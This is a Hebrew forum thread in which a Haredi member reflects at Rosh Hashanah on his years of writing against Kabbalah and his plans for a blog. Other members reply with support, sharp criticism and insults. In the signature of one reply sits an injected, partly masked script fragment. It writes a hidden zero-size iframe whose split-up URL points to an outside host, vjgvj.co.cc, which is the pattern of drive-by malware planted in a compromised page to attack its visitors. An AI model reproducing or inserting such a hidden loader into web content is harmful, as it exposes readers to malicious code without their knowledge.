בית פורומים עצור כאן חושבים

חשבון נפש ותקוה לעתיד (תש"פ!)

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-29/9/2019 17:54 לינק ישיר 
חשבון נפש ותקוה לעתיד (תש"פ!)

 

עכשו ערב ראש השנה תש"פ. החלפנו קידומת.

 

לאחר שהגעתי לגילו החגיגי של רב יוסף, ויצאתי מידי כרת של שנים, הגיע הזמן לעשות חושבים שעושים בגיל שבו אדם מתחיל להבין שאינו בן אלמוות.

לפני כעשרים שנה הייתי בין מקימי הפורום הזה. קיבלנו על עצמנו משימה, או שמא עלי לומר זאת בלשון יחיד: הצהרתי שאני מאמין, ואף אפשר לומר שאני יודע, שיש התאמה בין הדת לבין המדע, שאין סתירה ביניהם. והרי הדת היהודית אינה רק טוענת טענות שאינן עובדתיות, למשל ערכיות. הדת היהודית שלנו טוענת טענות אונטולוגיות: יש דין ויש דיין, למשל. וכן טענות היסטוריות: היה היה איש ואברהם שמו, והוא אבי האומה. היה הר במדבר סיני, ושמו סיני או חורב, ועליו ניתנה תורה והיתה התגלות. ועוד ועוד על הדרך הזו.

האמנתי, ואני עדיין מאמין, וסבור שאני יודע, שאיני טועה בכך שאני חי מתוך נסיון לקיים את הברית שכרת אלוקים עם עמנו. אני גם חרדי, כלומר סוציולוגית אני לבוש בביגוד המתאים ושולח את ילדי, וילדי את ילדיהם שלהם, לחינוך המאופיין כחרדי. וזו האחרונה היא ההגדרה החשובה ביותר.

אבל האם עודני חרדי במובן הפשוט שהייתי, אם הייתי, כאשר נפתח הפורום הזה? האם הדעות הפשוטות ואולי הפשטניות שבהן החזקתי עדיין מסוגל אני לאחוז בהן, האם אני רוצה ויכול לאחוז בהן?

אני חייב להיזהר אם אני רוצה להשאיר את הקטע האחרון במקומו. אני בעד גילוי נאות, אבל צריך לא להניח מקום לטעות. איני חפץ שיאמרו חברי לפורום ואולי קוראי (האם רשאי אני לחלום על תלמידים?): הוכיח סופו על תחילתו. תמיד ידענו. תמיד חשדנו שמי שחולק על אמונות הקבלה, מי שמעז לבדוק את ההיסטוריות של הטענות של המקובלים ושל המסורת שלנו בכלל, מי שמעז לחלוק על הסמכות הרבנית ועל הכלל של "ראשונים כמלאכים" ומציע ביקורת מטא הלכתית – לא יכול להיות חרדי, ולא יישאר חרדי. והנה, צדקנו.

אם החרדיות היא הלבוש החיצוני, אז אין שום חשיבות לטענות כאלו, אלא שאם צודקים המבקרים, אזי החרדיות כתופעה חברתית ודתית נידונה להיות חלקם של בורים ומי שעושים עצמם בורים ביודעין, אם כי בתיחכום לפעמים. איני רוצה להאמין שזה נכון. אני גם מכיר חרדים חושבים.

אם החרדיות היא דקדוק במצוות ומסירות ללימוד תורה, ומידות טובות כמו יושר וחסד, אני גאה להיות חרדי.

אולם החרדיות והמסירות הישיבתית לתורה הן הן הערכים שלהם אני ממשיך לחייב את עצמי. וכי יש משהו אחר?

 

******

בכל אופן, עברתי את הגיל שבו אדם יכול להרשות לעצמו לכתוב ככל העולה על רוחו, לקרוא כל מה שהוא רוצה, ללמוד ולהתמחות בכל תחום שיחשוק, ולהסתמך על כישוריו (כן, הגיל פוגע גם ביכולות האלו).

לאחר חודשים רבים שבהם נמנע ממני לכתוב, מכל מיני סיבות שחלקן מן הסתם יובילו לאאוטינג, הסיכון הישן שהפורום הקפיד על אכיפת איסורו, די לציין שנעדרתי ובינתים שאלתי את עצמי על ההמשך.

בשנים האלו שכתבתי כאן עסקתי בהמון תחומים. שאלות הלכתיות עם בירור הרקע המטא הלכתי שלהן, דיונים באופני הפסיקה הראויים, ניתוח של סוגיות ושל מעשים מן התלמוד שיש ללמוד מהם לדורות; פילוסופיה; קצת מדע במידה שהייתי מסוגל; ואפילו הומור, לפעמים כדי להעביר מסר פילוסופי, ולפעמים כדי לעקוץ וכדי להצביע על נקודות בעייתיות בחברה שאליה אני שייך אך לא אוכל לשתוק על כמה חסרונות ועוולות שיש בה, מדעת ושלא מדעת.

דבר אחד ברור. לא אוכל להמשיך לכתוב באותו קצב ובאותה כמות שהייתי כותב בעבר. צריך אני לחשוב מה אני רוצה ללמד, מה אני רוצה להשאיר אחרי, אם יש משהו שראוי להישאר, ואני סבור שכן.

לפיכך, אני מקוה להקדיש את הזמן שיהיה לי עבור הפורום ועבור המיימוניות שניסיתי לקדם בהתאם לתחומים הבאים:

אמונות ודעות. מעל לכל סבורני שיש לקיים "סור מרע" ולהסביר את החסרונות שיש באמונות הקבלה. מהי קבלה, מהי התפתחותה ההיסטורית, מהי היהדות האותנטית של המקרא ושל חז"ל ומדוע הקבלה היא מינות ביחס למקורות הראשוניים והמחייבים האלו.

עשה טוב. בירור מהי התורה וההלכה המחייבת עבור עם ישראל. דומה בעיני שראוי לפרסם חיבור שיקביל לשולחן ערוך בסדרו (או לטור, או ל"ערוך השולחן" שהינו בסיס מצויין לצאת ממנו) שיבהיר את רבדי ההלכה, הדאורייתא, הדרבנן ומדוע כל השאר אינו רלוונטי (מנהגים). דוגמא מופתית לצורת כתיבה כזו היא של הרב מלמד בספרי "פניני הלכה", אבל הוא כן כותב מנהגים ואני סבור שזו בעיה.

איני יודע כמה עוד מגיעים לפורום, אם בכלל. הנסיון הקצר והכפול שלי עם פייסבוק הראה לי שפירסום שם מגיע אמנם לרבים אבל כיון שאיני יכול להחשף גם עבורם, ובמיוחד אין הם מאפשרים להשתמש בכינוי במקום שם של ממש, ברגע שמישהו ירצה בכך, יחסמו אותי שוב. אין תועלת לנסות שוב את המדיה הזו למרות שיש לה הדהוד רב.

במקום זה אפשר שמוטב לפרסם את דברי בבלוג. יש בלוגים חינמיים שבהם אין מן הסתם סכנת מחיקה וצנזורה. את הדברים החדשים שיהיה לי לומר אפרסם כאן ושם. את הדברים הישנים והראויים שנמצאים בארכיוני הפורום אפרסם מחדש שם. ככל שאוכל ויספיק הזמן.

סליחה מכל אלו שציערתי. תודה לכל אלו שטרחו לקרוא ולחשוב ולהגיב. תודה לאלו שתמכו, ברבים או בפרטי, מפני שאני אנושי, ובניגוד לרמב"ם שכנראה לא היה זקוק להסכמת רבים או מעטים ודי לו שהאמת איתו, אני אנושי במידה כזו שאני שמח לגלות שיש, בעיקר חכמים, שדברי מעניקים להם תובנות או מביאים אותם להסכים ולומר: זה בדיוק מה שרציתי לומר. כמובן תודה לאלו שהרחיבו את אופקי, לימדו אותי מה שלא ידעתי, ותיקנו אותי כאשר טעיתי.

שנה טובה לכולנו.

 

 





דווח על תוכן פוגעני

מנותק
נשלח ב-1/10/2019 22:07 לינק ישיר 




דדווח על תוכן פוגעני

מחובר
נשלח ב-1/10/2019 23:20 לינק ישיר 
אלראזי

מי מצנזר אותך כאן, שאתה זקוק לבלוג? חוץ מזה, כל הפוסט שלך מלא סתירות. לא ברור מה מקור שאיפתך להיות "חרדי", אך לפי כל הגדרה אפשרית, 'חרדי' אינו יכול לכפור בקבלה. 'חרדי' כיום הריהו בראש ובראשונה מונח סוציולוגי. אני רואה גם שאתה כבר בשלב התהיות מה תשאיר אחריך. אם מורשתך היא, כעולה מן הפוסט הזה, היצמדות נואשת לקהילה החרדית תוך מאמץ בלתי-פוסק להסתרת כפירותיך הקטנות והתעקשות עם זאת לפזרן באינטרנט, אני בספק גדול אם זו מורשת הראויה להנחילה למאן דהוא. וכי ישנו בר-דעת שיבחר לו לכתחילה חיים שכאלו?



דדווח על תוכן פוגעני

מחובר
נשלח ב-1/10/2019 23:24 לינק ישיר 

סתירות נוספות בפוסט הפאתטי למדי שלך: אתה מודה בדאורייתא ובדרבנן וכופר במנהגים. אך מנהגים, לפי התלמוד, מחייבים גם הם מ'בל יחל' דאורייתא; עיין פסחים נ' ובכמה מקומות. אמנם מדריגתם פחותה מדאורייתא ומדרבנן, אך אין מי שטוען כי אינם מחייבים כל עיקר. גם הספר שאתה חולם עליו, נראה מיותר לגמרי. לומדים רגילים מבינים לבדם בכל מקום מהו גדר החיוב, ומכל מקום קיים כבר ספר דומה - קרית ספר להמבי"ט על הרמב"ם.



דדווח על תוכן פוגעני

מחובר
נשלח ב-2/10/2019 02:37 לינק ישיר 

וואוו, באמת פוסט מטלטל, מבחינת הספינה הקרויה עצכח. 
רוב הנוסעים עזבו אותה זה מכבר, עבור פיראטים העושים בה שמות , והנה רב החובל הופיע בלי הודעה מוקדמת , כמו שנעלם ארוכות בלי הודעה מוקדמת .. והפעם הוא נשמע נחרץ יותר, ואף בלי החתימה הקבועה שומר פיו ולשונו וכו', ..

אכן, המקום כאן חדל כמעט מלחדש , והוא משפיע כל הצופים השותקים הקוראים בו ולוקחים ממנו מה שלוקחים לפי הבנתם . ומה שנותר ויסייע הוא, לארגן את החומר אם בסגנון ויקיפדיה או לפחות מפתחות בסגנון הלינק זעצער.
ואתה ר' מיימוני, אם יש לך משנה סדורה בנושא מסויים ולא ספקנית, פשוט לארגן אותה כתזה ולפרסם במקומות שיזכו להדהוד רב יותר, אם בפייסבוק על ידי מישהו בעל שם אמיתי, בלוג, רשימת תפוצה ברשתות חברתיות ואפשר לפרסם  בלוג  וברשתות ובפורומים לפרסם תקציר עם הפניה למקור.  
ובהצלחה בכל שתפנה.   



דדווח על תוכן פוגעני

מחובר
נשלח ב-2/10/2019 15:26 לינק ישיר 

הרב מימוני   
הצער היחידי שציערת אותי  בזה שלא כתבת מספיק.
כשפתחת את הפורום המבורך הזה  הגעת כנראה לבינה. הרגשנו זאת כל חברי הפורום.
אני מצפה מהיום כשהגעת ל דרגת זקן = חכם. אני מצפה עדיין לחכמה של בינה.
הפורום שמם כי לא היה רועה לעדר. לצאן קדושים. הם לא הובלו למקומות מרעה ומעינות חיים.
שתהיה  שנת פריחה  ופריצה למעינות המים הרבים שיש מתחתנו בתוכנו ומעלנו.
אישית אני מודה לך ולשותפיך לפתיחת הפורום המבורך הזה. תרם לי רבות רבות



דדווח על תוכן פוגעני

מנותק
נשלח ב-3/10/2019 08:09 לינק ישיר 
דורש_אמת

שלום מיימוני

לפחות כתבת ברור את מחשבותיך שלדעתי ולדעת הרבה פוסקים ובינהם השל"ה שמביא את הרמ"ק  שדווקא מי שלא מאמין בקבלה הוא כופר והרי דנו על זה בפורום ואני לא בא לדון בזה שוב .
אבל ברור שאני יכול לאחל לך רק דבר אחד שתעשה תשובה לפני יום כיפור ושלא יהיה לך אפילו תלמיד אחד  שחלילה יצא כופר בגלל שלמד את תורתך .
יתכן ויש לך תלמידים רבים שכופרים בתורת הקבלה אבל אין זה מעניני אני רק יכול להתפלל שכל יהודי אמיתי בעם ישראל יעשה תשובה ושדבריך לא ישפיעו על שום יהודי אמיתי .
וברור שבכל זאת יש לך חלק בקדושה שהרי בזכותך הייתי צריך לצמצם את כתיבתי כדי שדברי יובנו על ידי חברי הפורום ואני שמח שידעתי כל הזמן שאילו דיעותיך ולא חשבתי אחרת . 
ובהודעה הראשונה שלי באישי אליך כבר זיהיתי בך את שאיפתך להיות כאחד מגדולי העם ושזה גורם לשיבוש מחשבותיך .
נכון שכתבתי זאת בסגנון שונה קצת אבל זה היה המובן שהרצון להיות כמו הרמב"ם משבש את המחשבה .
ונסיים בברכה  שבקרוב יתגלה מלך המשיח בפהרסיה והאמת תהיה גלויה והיהודים האמתיים יעשו תשובה ויתגלו כל הערב רב והשיידין יהודאין שמובא בליקוטי מוהרן בצורה מפורטת איך אפשר לזהות תורות שלהם .




תוקן על ידי דורש_אמת ב- 03/10/2019 06:09:26




דדווח על תוכן פוגעני

מנותק
נשלח ב-3/10/2019 08:45 לינק ישיר 

תודה לכולם.

לא לפי סדר הכתיבה אלא לפי סוגי התגובות. הרשו לי.

תיקון: תודה קודם כל לבעל בעמיו שעשה הרבה בלי אף מילה, רק עם אמוג'י.

תודה לירוחמ. מילים כשלו מחזקות אותי בשעה שאני שואל עצמי כאליהו האם יש טעם לצעוק נגד אמונות שגויות (התשובה: ודאי שלא. צריך לאתגר אותן ולתת דוגמא איך מתמודדים עם שאלות והנחות יסוד כדי להגיע, עד כמה שאנו כבני אדם, מסוגלים לאמת).

תלמידתלמיד, גם לך תודה. זה באמת בידי שמים לקבוע כמה זמן יהיה לי וכמובן לי עצמי לנצל את הזמן נכון.

דורש אמת, אני חש באהבתך מתוך איחוליך. יש לנו ויכוח גדול על הקבלה ואפילו מה עומד מאחורי המילה הזו לא מוגדר באופן חד משמעי. אבל אני כבר מודה לך שהתאווה לפירסום היא אחד הגורמים לטשטוש ולטעות וצריך מאד להיזהר מזה. (אבל צריך גם לא להיזהר יותר מדי). תודה על התזכורת. הלוואי שהכרה זו תגן עלי.

אלראזי, דבריך מצריכים התייחסות לכל נקודה כפי שהייתי עושה בעבר. אנסה...

שנה טובה לכולם!

_________________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");



תוקן על ידי מיימוני ב- 03/10/2019 06:54:32




דדווח על תוכן פוגעני

מנותק
נשלח ב-3/10/2019 08:54 לינק ישיר 

אלראזי

תמיד השתדלתי להתייחס לכל נקודה ואנסה בקיצור. דבריך, כמו אלו של דורש אמת, מאתגרים. סבורני שיש כמה נקודות ברורות להצביע עליהן. לפעמים צריך להבהיר נקודות שלא הבהרתי מספיק לעיל.

בלוג נועד, כדברי תלמיד תלמיד, להיות זמין יותר מאשר פורום שבו אשכולות שוקעים. ולרכז את דברי שלי במקום אחד אם יהיו מעוניינים. (אני שמח שיש).

יש הגדרות רבות לחרדיות. לפי חלקן אני שמח ומאושר להיות חרדי. לפי אחרות אני חש מוגבל ולא שייך. בכל אופן, יש ויש חרדים סוציולוגית ואמונית שאינם מאמינים בקבלה בשום מובן שלה. ויש אחרים שמנסים ככל יכולתם לפרש ולנסח אותה מחדש כדי שיוכלו לא לדחותה מעליהם, בסתר ובגלוי. זאת גם אם נבחר את ההגדרות הסוציולוגית ל"חרדיות".

מורשתי היא לחפש את האמת ולהאמין שזה אפשרי ושהיא עולה בקנה אחד עם היהדות, או עם החלקים החשובים שלה לדורותיה. זה כמובן מחייב לעיין במסורת ולדעת מה לקרב ומה להרחיק. זו היתה גם מעלתו של הרמב"ם, כפי שכתבתי באשכול הראשון כמבוא שלי למורה נבוכים. זה השיעור החשוב ביותר שהשאיר לנו. לא נסיונו לפרש את היהדות לפי אריסטו אלא מוכנותו לפרש את היהדות שלפניו בהתאם להבנתו מהי האמת.

שאלת בצדק מי יבחר לו חיים של עימות פנימי. אמנם יש כאלו שעבורם אלו החיים האמיתיים, גם אם הם קשים.

לגבי מיון ההלכה לפי חיוביה ומקורותיה ומעמדם של מנהגים - בוודאי שפשטות הלשון של סוגיות מסויימות מעניק למנהגים שלא אושר בידי חז"ל סמכות. (מומלץ מחקרו של תא שמע על המנהג הקדמון באשכנז שמסכם יפה את הנושא כדרך החוקרים). יהיה עלי לכתוב באריכות יותר כדי להבהיר מדוע אני חושב אחרת. כמדומה שכבר עסקתי בזה בעבר פה ושם בפורום שלנו. וצריך זמן כדי לכתוב מחדש...

תודה על התייחסותך. אתה כתמיד מאתגר.



דדווח על תוכן פוגעני

מנותק
נשלח ב-4/10/2019 12:05 לינק ישיר 

אני הק' לא מתעניין די בקבלה.
לא מבין מדוע אנשים רואים בזה עיקר התורה, אבל מבין את המשיכה לזה.
לא מזלזל באף אחד שלומד מדרש שנכתב ע"י חכמים בישראל - יהיו מי שיהיו, תנאים או סבוראים... ואשר קיבלו אותה הגר"א מוילנא ועוד באופן מוחלט [האם תפסו זאת כעיקר התורה, אינני בטוח. לענ"ד, לכל הפחות תפסו את הסוד כעומק אמתי, ואולי כצמרת וכפסגת ההבנה].

לדעתי היחס שנותנים לתורת הקבלה משני צדי המתרס, הוא לא פרופורציונלי.
מה אכפת לך שתורת הרגש מקבלת צורה בכתבי המקובלים ובמדרשים, תורת הרגש נטו, אף אחד לא התחייב ליותר מזה.
הקבלה היא 'תורת הרגש', היא מתארת את מה שהמקובלים רואים ומרגישים, הגאון גם ראה והרגיש ועוד רבים מגדולי ישראל הרגישו והתחברו לעומק משל זה. ולהבדיל, לפי הנראה כמעט כל מי שנכנס לקבלה - רואה ומרגיש.

לא מבין מה האובססיה של המקובלים, לא מבין מה האובססיה של הכופרים [בקבלה], זה [כנראה] מדרש עמוק ומקיף, ובשביל לדון בו כנראה צריך להיות שקוע בו ולהיכנס לתוכו [מסתמא הרב מיימוני עשה זאת], ואז לחוות דעה אם זה בכלל 'עושה' משהו [כנראה שכן], והאם זה לגמרי סותר את ההגשמות המרובות שבתנ"ך [ולא האם זה סותר את הפילוסופיה של הרמב"ם שיש שיאמרו שהרלוונטיות שלה לחיי המעשה ולחיי התורה פחות משמעותי].

לא מבין מה זה מעניין.

או כמו שהבנתי שבבריסק תפסו, זה לא עיקר עסק התורה. וכמו שהרב שך כתב.

אז יאללה, מי שחשוב לו ללמוד מדרשים, ושחשוב לו עסק הקבלה, שיערב לו, יש לו בהחלט על מי לסמוך....
ואם זה יעבוד לו, אז שישפיע עלינו צינורות של חסד....



דדווח על תוכן פוגעני

מחובר
נשלח ב-5/10/2019 19:58 לינק ישיר 

"לחפש את האמת ולהאמין שזה אפשרי ושהיא עולה בקנה אחד עם היהדות"
לא חלי ולא מרגיש דקא סתרא סיפא לרישא. אי אפשר לחפש את האמת כשמניחים שהיא כפופה למשהו. אתה יכול לומר שבשלב זה בחיפוש אתה מאמין שהאמת עולה בקנה אחד עם היהדות, אבל דומני שמכתיבתך כאן במשך השנים אכן ניכר שזה לא המצב - אינך מחפש את האמת באופן חופשי אלא רק בכפוף לאמונות מסוימות. לכן גם אינך משתתף בדיונים, חלקם מאתגרים, על כתיבת התורה.



דדווח על תוכן פוגעני

מחובר
נשלח ב-6/10/2019 03:56 לינק ישיר 

מיימוני כתב:
אלראזי

תמיד השתדלתי להתייחס לכל נקודה ואנסה בקיצור. דבריך, כמו אלו של דורש אמת, מאתגרים. סבורני שיש כמה נקודות ברורות להצביע עליהן. לפעמים צריך להבהיר נקודות שלא הבהרתי מספיק לעיל.

בלוג נועד, כדברי תלמיד תלמיד, להיות זמין יותר מאשר פורום שבו אשכולות שוקעים. ולרכז את דברי שלי במקום אחד אם יהיו מעוניינים. (אני שמח שיש).

יש הגדרות רבות לחרדיות. לפי חלקן אני שמח ומאושר להיות חרדי. לפי אחרות אני חש מוגבל ולא שייך. בכל אופן, יש ויש חרדים סוציולוגית ואמונית שאינם מאמינים בקבלה בשום מובן שלה. ויש אחרים שמנסים ככל יכולתם לפרש ולנסח אותה מחדש כדי שיוכלו לא לדחותה מעליהם, בסתר ובגלוי. זאת גם אם נבחר את ההגדרות הסוציולוגית ל"חרדיות".

מורשתי היא לחפש את האמת ולהאמין שזה אפשרי ושהיא עולה בקנה אחד עם היהדות, או עם החלקים החשובים שלה לדורותיה. זה כמובן מחייב לעיין במסורת ולדעת מה לקרב ומה להרחיק. זו היתה גם מעלתו של הרמב"ם, כפי שכתבתי באשכול הראשון כמבוא שלי למורה נבוכים. זה השיעור החשוב ביותר שהשאיר לנו. לא נסיונו לפרש את היהדות לפי אריסטו אלא מוכנותו לפרש את היהדות שלפניו בהתאם להבנתו מהי האמת.

שאלת בצדק מי יבחר לו חיים של עימות פנימי. אמנם יש כאלו שעבורם אלו החיים האמיתיים, גם אם הם קשים.

לגבי מיון ההלכה לפי חיוביה ומקורותיה ומעמדם של מנהגים - בוודאי שפשטות הלשון של סוגיות מסויימות מעניק למנהגים שלא אושר בידי חז"ל סמכות. (מומלץ מחקרו של תא שמע על המנהג הקדמון באשכנז שמסכם יפה את הנושא כדרך החוקרים). יהיה עלי לכתוב באריכות יותר כדי להבהיר מדוע אני חושב אחרת. כמדומה שכבר עסקתי בזה בעבר פה ושם בפורום שלנו. וצריך זמן כדי לכתוב מחדש...

תודה על התייחסותך. אתה כתמיד מאתגר.


מיימוני, 

כדרכך הרבית להג מבלי לומר דבר. כבר סברתי להקהות את שיניך, אך חזרתי בי, הן מפני שאין עם מי לדבר, והן מפני שנמלכתי בדעתי כי היום הזה ז' תשרי אדבר אליך טובות.

ולכן אומר אני, מאחר ועומד אתה בשלב הסיכומים, כי כבר כתב הג' בעל נתיה"מ בצוואתו כי דבר טוב אחד בספר מציל כל הספר. ואף אתה מרוב שיחך ושיגך ופטפוטיך, נחקק בליבי גרגר יקר אחד שחידשת, והוא בעניינא דיומא.

כי זוכר אני שהבאת פעם ראיה נפלאה מהירושלמי בברכות ובתענית דבעי לשנויי במי ששימש מיטתו מבעוד יום ושכח ולא טבל ולא בבעל קרי, ופריך ממעשה בר' יוסי בן חלפתא שראו טובל אותו בצינעה ביוהכ"פ - אית לך מימר על אותו הגוף הקדוש בשוכח? ומכאן הוכחת, מיימוני, דלא כהמקובלים והחסידים שעושים סקנדלים עצומים מחלומות רטובים... ובגנצפריד המנוקד בסי' קנ"א כתוב: יטול ידיו ויאמר בשברון לב וכו'... חחח... ואילו הירושלמי להיפך ממש, מזדעזע מ"אותו הגוף הקדוש בשוכח", ולא, אללי, מאותו הגוף הקדוש בחלום רטוב... 

אשריך, מיימוני! יהלום יקר כזה שנזדמן לידך, אם אמנם פרי רוחך הוא - ואכן, לא ראיתיו עד הנה בשום מקום - מכפר על כל תשפוכות הבליך המרובים כל השנים, והיה כל זה כדאי להוציא יקר מזולל, כפי תהיה!

ואם אמנם משלך הוא, מיימוני, שואל אני רשות ממעלתך לשבצו בספר שבדעתי לכתוב: 'הקבלה: אסונה של אמונת ישראל', ולכתוב שראיתיו אצל 'מיימוני', מנהל הפורום האינטרנטי 'עצור כאן חושבים', שממחשכי מחראות בני ברק נלחם כל ימיו בקבלה במסירות נפש נוראה, בעוז ובתעצומות, עשרות שנים, עד דיכדוכה של נפש בצוואתו מערב ראש השנה תש"פ, שלא מצא במה לפותחה אלא בכך. ובזה אערוך נר לנשמתך הווירטואלית, ויד ושם אתן בביתי ובחומותיי ל'מיימוני', הדון-קישוט העצכ"חי. 

 



דדווח על תוכן פוגעני

מחובר
נשלח ב-6/10/2019 14:33 לינק ישיר 
אלראזי

תושבעפ כתב:
אני הק' לא מתעניין די בקבלה.
לא מבין מדוע אנשים רואים בזה עיקר התורה, אבל מבין את המשיכה לזה.
לא מזלזל באף אחד שלומד מדרש שנכתב ע"י חכמים בישראל - יהיו מי שיהיו, תנאים או סבוראים... ואשר קיבלו אותה הגר"א מוילנא ועוד באופן מוחלט [האם תפסו זאת כעיקר התורה, אינני בטוח. לענ"ד, לכל הפחות תפסו את הסוד כעומק אמתי, ואולי כצמרת וכפסגת ההבנה].

לדעתי היחס שנותנים לתורת הקבלה משני צדי המתרס, הוא לא פרופורציונלי.
מה אכפת לך שתורת הרגש מקבלת צורה בכתבי המקובלים ובמדרשים, תורת הרגש נטו, אף אחד לא התחייב ליותר מזה.
הקבלה היא 'תורת הרגש', היא מתארת את מה שהמקובלים רואים ומרגישים, הגאון גם ראה והרגיש ועוד רבים מגדולי ישראל הרגישו והתחברו לעומק משל זה. ולהבדיל, לפי הנראה כמעט כל מי שנכנס לקבלה - רואה ומרגיש.

לא מבין מה האובססיה של המקובלים, לא מבין מה האובססיה של הכופרים [בקבלה], זה [כנראה] מדרש עמוק ומקיף, ובשביל לדון בו כנראה צריך להיות שקוע בו ולהיכנס לתוכו [מסתמא הרב מיימוני עשה זאת], ואז לחוות דעה אם זה בכלל 'עושה' משהו [כנראה שכן], והאם זה לגמרי סותר את ההגשמות המרובות שבתנ"ך [ולא האם זה סותר את הפילוסופיה של הרמב"ם שיש שיאמרו שהרלוונטיות שלה לחיי המעשה ולחיי התורה פחות משמעותי].

לא מבין מה זה מעניין.

או כמו שהבנתי שבבריסק תפסו, זה לא עיקר עסק התורה. וכמו שהרב שך כתב.

אז יאללה, מי שחשוב לו ללמוד מדרשים, ושחשוב לו עסק הקבלה, שיערב לו, יש לו בהחלט על מי לסמוך....
ואם זה יעבוד לו, אז שישפיע עלינו צינורות של חסד....
שאלות טובות אתה שואל. אולי תתחיל בבירור הסיפור המשעשע על הבד"ץ שחייבו את רבך, לייבלי מינצברג, בנזיפה בחליצת נעליים על שטען כי הג' חזו"א ידע 'נגלה' יותר מהאר"י... ומשם נמשיך.

_________________




דדווח על תוכן פוגעני

מחובר
   
בית > פורומים > דת ואמונה > עצור כאן חושבים > חשבון נפש ותקוה לעתיד (תש"פ!)
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר